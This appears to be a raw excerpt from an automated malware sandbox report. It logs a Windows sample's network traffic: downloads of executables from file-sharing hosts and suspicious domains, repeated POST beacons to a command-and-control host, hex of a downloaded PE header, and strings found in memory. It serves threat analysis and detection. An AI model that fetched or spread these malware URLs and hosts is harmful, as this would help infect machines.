                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 22:39:18 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 22:39:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: GET /32739433.dat?iddqd=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.233.81.115
                          Source: global trafficHTTP traffic detected: GET /attachments/903666793514672200/930134152861343815/Nidifying.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                          Source: global trafficHTTP traffic detected: GET /abhF HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: goo.su
                          Source: global trafficHTTP traffic detected: GET /XvD HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: goo.su
                          Source: global trafficHTTP traffic detected: GET /get/QbPlFD/G.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/8a444287feca136d19310b76ef81e54fc12.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: softwaresworld.net
                          Source: global trafficHTTP traffic detected: GET /get/ealX1m/11.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /get/2w2PAQ/joke214324.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /get/wP2pzq/1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgroj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucnjepelsb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fnufff.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edyuxkjhn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hpsqryuep.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdvlj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gylxsot.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfdacebe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ognflovg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vwwgouyyu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljpmlskjw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgdqpo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewfecsg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dtnpcii.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kbycni.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wuweqcxcm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gvaoyk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://isitf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iauswed.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://schieym.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hyjcl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tilkkrykmo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foranher.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ojvqrvcy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbsmoqe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxquxmnlu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://huwmmurp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrqocneu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svnsu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqsvas.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wxpgf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlfotbnto.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pttknu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jydxuwn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9993_1641737702_2517.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nshrr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pntpge.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tjhxrgmht.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hsjdosxpvn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmflv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aacuf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://coduhchcur.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mtdkhr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pnnppkk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjmey.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nkcbokwpr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qphatsqfxk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psstrgiysi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://teodgt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjmss.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymhmsmhwi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gqyls.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hrquqg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqcayqmoy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfqnt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufveq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acqttgcy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whgupdjfc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://npfumn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /bit.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sehfdkfjvgn.xyz
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtiylkqmm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylwpvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbljr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: host-data-coin-11.com
                          Source: global trafficTCP traffic: 192.168.2.5:49805 -> 185.7.214.171:8080
                          Source: global trafficTCP traffic: 192.168.2.5:49843 -> 40.93.207.0:25
                          Source: svchost.exe, 00000004.00000002.609736637.00000202DB68A000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.416177525.0000000004E3E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.421939373.0000000004E54000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.416537843.0000000004E53000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: svchost.exe, 00000004.00000002.609736637.00000202DB68A000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                          Source: svchost.exe, 00000004.00000002.557736532.00000202D60A7000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/ad
                          Source: svchost.exe, 0000000A.00000002.309295721.0000024462C13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                          Source: svchost.exe, 00000008.00000002.529529749.000001F815C3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                          Source: svchost.exe, 00000008.00000002.529529749.000001F815C3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                          Source: svchost.exe, 00000008.00000002.529529749.000001F815C3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                          Source: 2655.exe, 0000001A.00000002.447200055.0000000004331000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                          Source: svchost.exe, 00000008.00000002.529529749.000001F815C3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                          Source: svchost.exe, 00000008.00000002.529529749.000001F815C3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                          Source: svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                          Source: svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                          Source: svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                          Source: svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
